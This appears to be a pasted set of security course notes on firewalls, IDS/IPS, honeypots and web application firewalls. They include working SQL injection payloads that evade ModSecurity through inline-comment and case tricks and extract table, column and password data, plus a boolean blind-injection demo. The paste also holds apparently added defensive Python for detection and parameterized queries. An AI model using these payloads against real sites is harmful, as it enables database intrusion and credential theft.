sm4rtn0bit4

D-12

Feb 7th, 2019
  1. SESSION 12
  2. ============
  3.  
  4. INTRODUCTION TO FIREWALLS, IDS, IPS
  5. ======================================
  6.  
  7. FIREWALLS
  8. ==========
  9. A firewall is a component used to filter the incoming and outgoing (inbound and outbound) traffic of a particular network. A firewall has a database of signatures for the data packets moving into or out of a network. Data packets in the network traffic that carry malicious content can be blocked by the firewall according to the rule sets created by a network administrator.
  10.  
  11. TYPES OF FIREWALLS
  12. ===================
  13. 1. Software-Based Firewalls: firewalls in the form of an application or software that holds rule sets for the inbound and outbound traffic of a network. E.g. Windows Firewall, Linux firewalls (iptables).
  14.  
  15. 2. Hardware-Based Firewalls: a hardware-based firewall is a peripheral, a system box with its own processor, that gives us a configuration panel and has more advanced features than a software-based firewall.
  16. E.g. Juniper, Sophos, Endian, etc.
  17.  
  18. IDS
  19. ===
  20. IDS stands for Intrusion Detection System. It is a software- or hardware-based program that detects every suspicious activity and creates a log of it. It can also send the logs immediately to the network administrator, so that they can find out that there is an intruder in the network.
  21. It comes in different types, such as NIDS (Network IDS), HIDS (Host IDS), WIDS (Wireless IDS), etc.
  22.  
  23. IPS
  24. ===
  25. IPS stands for Intrusion Prevention System. It works by immediately stopping intruders who are carrying out malicious and illegal activities in the network or with its clients.
  26.  
  27. E.g. of IDS and IPS: Snort, etc.
  28.  
  29. HONEYPOTS
  30. =========
  31. A honeypot is an attracting and luring technique to trap a hacker or attacker: a decoy victim, which can be a web application, a network system or an access point (wireless connection), that seems absolutely normal but is created to trap attackers.
  32.  
  33. ------------------------------------------------------------------
  34.  
  35. MISCONFIGURED WAF
  36. =================
  37.  
  38. INTRODUCTION TO WAF - A web application firewall works just like a network firewall, with inbound and outbound rule sets, but for a web application or web site rather than a network. A WAF filters HTTP and HTTPS traffic, along with the communication handling done by TCP/UDP, and also works with some advanced mitigation programs, such as securing against the OWASP Top 10.
  39.  
  40.  
  41. FOR EXAMPLE: MOD SECURITY
  42.  
  43. ----------------------------------------------------
  44. INSTALLING AND CONFIGURING MOD SECURITY WAF (JUST FOR REFERENCE)
  45. ================================================================
  46.  
  47. OS - UBUNTU 14.04
  48.  
  49. Mod Security WAF
  50.  
  51. ------------------------------------------------------------------------------------------
  52.  
  53. BYPASSING MOD WAF
  54. ==================
  55.  
  56.  
  57. union select
  58. /*!uNiOn*/ /*!SelEcT*/
  59.  
  60. /*! > STARTING
  61. */ > ENDING
  62.  
  63. Steps :-
  64.  
  65. = Finding the GET method.
  66. = Generating an SQL syntax error with (').
  67. = Checking the number of columns with ORDER BY.
  68. = Getting the vulnerable columns with UNION SELECT.
  69. = Getting an error while finding out the vulnerable columns.
  70.  
  71.  
  72. Inline Executable Comments -
  73.  
  74. query sanjeev
  75.  
  76. start - /*!
  77. end - */
  78.  
  79. with Inline Executable Comments - /*!sanjeev*/
  80.  
  81. Changing the letter case of keywords
  82.  
  83. union select > uNiOn SeLECt
  84.  
  85.  
  86. Inline Executable Comments
  87. ---------------------------
  88. Union - /*!UniOn*/
  89. Select - /*!SelECt*/
  90. But these will only work if the DB version is less than 6. The version is always in decimal notation; we can also write it with the periods (.) removed. E.g. 5.00.00 -> 50000
  91.  
  92. So, to find out whether the inline comments work or not, we have to put the database version with UNION SELECT, like:
  93.  
  94. = php?id=1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+
  95.  
  96. = To get the database and version :
  97. /*!50000UniOn*/ /*!50000SelECt*/ database(),version()--+
  98.  
  99. = To get the table name from information_schema :
  100. /*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from /*!50000Information_schame.tables*/--+
  101.  
  102. = To get the column name from users table :
  103. /*!50000UniOn*/ /*!50000SelECt*/ 1,column_name from /*!50000Information_schame.columns*/ where table_name="users"--+
  104.  
  105. = To get the data:
  106. /*!50000UniOn*/ /*!50000SelECt*/ 1,/*!50000Group_concat(User_id,Users,Password)*/ from users--+
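
Seen from the WAF side, the case changes and inline executable comments above only get past a rule that matches the literal text "union select". The following added example (not part of the original notes; the function names are assumptions) normalizes a parameter value the way MySQL effectively reads it before testing for UNION SELECT, and runs a literal rule and the normalized rule over constructed sample values.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ (optionally prefixed by a 5-digit
# version number), so a filter must inspect that body instead of skipping it.
VERSIONED_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")

def naive_match(value: str) -> bool:
    """Case-sensitive literal match: the kind of rule the notes get past."""
    return "union select" in value

def normalize(value: str) -> str:
    """Reduce a parameter value to the form the database would parse."""
    value = unquote_plus(value)                    # %xx and '+' decoding
    value = VERSIONED_COMMENT.sub(r" \1 ", value)  # keep the executable body
    value = PLAIN_COMMENT.sub(" ", value)          # ordinary comments act as whitespace
    value = value.lower()                          # SQL keywords are case-insensitive
    return re.sub(r"\s+", " ", value).strip()

def normalized_match(value: str) -> bool:
    """Keyword match on the normalized value, with word boundaries."""
    return bool(UNION_SELECT.search(normalize(value)))

# Constructed sample values: the forms shown in the notes, plus benign input.
SAMPLES = [
    "1' union select 1,2--+",
    "1' uNiOn SeLECt 1,2--+",
    "1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+",
    "1' /*!UniOn*/ /*!SelECt*/ 1,2--+",
    "42",
    "trade union selection committee",
]

def report(samples=SAMPLES):
    """Return (sample, naive verdict, normalized verdict) for each sample."""
    return [(s, naive_match(s), normalized_match(s)) for s in samples]

if __name__ == "__main__":
    for sample, naive, norm in report():
        print(f"naive={naive!s:5} normalized={norm!s:5} {sample}")
```

The literal rule misses three of the four injection forms and flags the benign last sample; the normalized rule gets all six right.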
  107.  
  108. --------------------
  109.  
  110. BLIND BASED SQL INJECTION
  111. ==========================
  112.  
  113. Blind SQL injection is a type of SQL injection attack vector in which the application doesn't give us any SQL syntax error, but injection is still possible.
  114. If there is some data in the web application, it will show the data; otherwise it will reload the same page.
  115.  
  116. STEPS
  117. =====
  118. 1. Finding the GET Method
  119. 2. Finding the vulnerability by (')
  120. 3. Finding the number of columns in the database by using ORDER BY with any ID for which we get data.
  121. 4. Finding the Vulnerable column by Union Select.
  122. 5. Same steps further as Union Based SQL Injection.
  123.  
  124. Demo of Blind Based Boolean
  125. ============================
  126. 1
  127. 1'
  128. 1' and 1=0 # ---> False
  129. 1' and 1=1 # ---> True
  130. 1' and 1=0 order by 1 # --> No Result ---> Generic error
  131. 1' and 1=1 order by 1 # --> Result --> normal result
  132. 1' and 1=0 order by 2 # --> No result
  133. 1' and 1=1 order by 2 # ---> Result
  134. 1' and 1=0 order by 3 # ---> No Result
  135. 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 columns
  136. 1' and 1=0 union select 1,2 #
  137. 1' and 1=1 union select 1,2 #
  138.  
  139. and so on.
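
The true/false difference in the demo above exists only because the parameter is concatenated into the SQL text. This added example (not from the original notes; the table and function names are assumptions, and SQLite stands in for MySQL, so `--` replaces `#` as the comment marker) sends the same probe pair to a concatenated query and to a parameterized one.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the application's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)",
                   [("1", "alpha"), ("2", "beta")])
    return db

def lookup_concatenated(db, item_id):
    """Vulnerable pattern: the parameter is pasted into the SQL text."""
    sql = "SELECT name FROM items WHERE id = '" + item_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, item_id):
    """Hardened pattern: the parameter is bound as a value, never parsed as SQL."""
    return db.execute("SELECT name FROM items WHERE id = ?",
                      (item_id,)).fetchall()

# The true/false pair from the demo, with '--' as the SQLite comment marker.
PROBE_FALSE = "1' and 1=0 -- "
PROBE_TRUE = "1' and 1=1 -- "

def oracle_exists(lookup):
    """True if the true and false probes get different answers from lookup."""
    db = make_db()
    return lookup(db, PROBE_TRUE) != lookup(db, PROBE_FALSE)

if __name__ == "__main__":
    print("concatenated  :", oracle_exists(lookup_concatenated))
    print("parameterized :", oracle_exists(lookup_parameterized))
```

With the bound parameter both probes are compared against the id column as plain strings, match no row and return the same empty result, so the page gives no true/false signal.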
  140.  
  141. TASK
  142. =====
  143. 1. PoC on Blind Based SQL Injection.
  144. 2. List of 10 WAFs.
  145.  
  146.  
  147.  
  148. WAF ARTICLE : http://www.tamilbotnet.com/2016/06/sql-injection-web-application-firewall-bypassing-in-tamil.html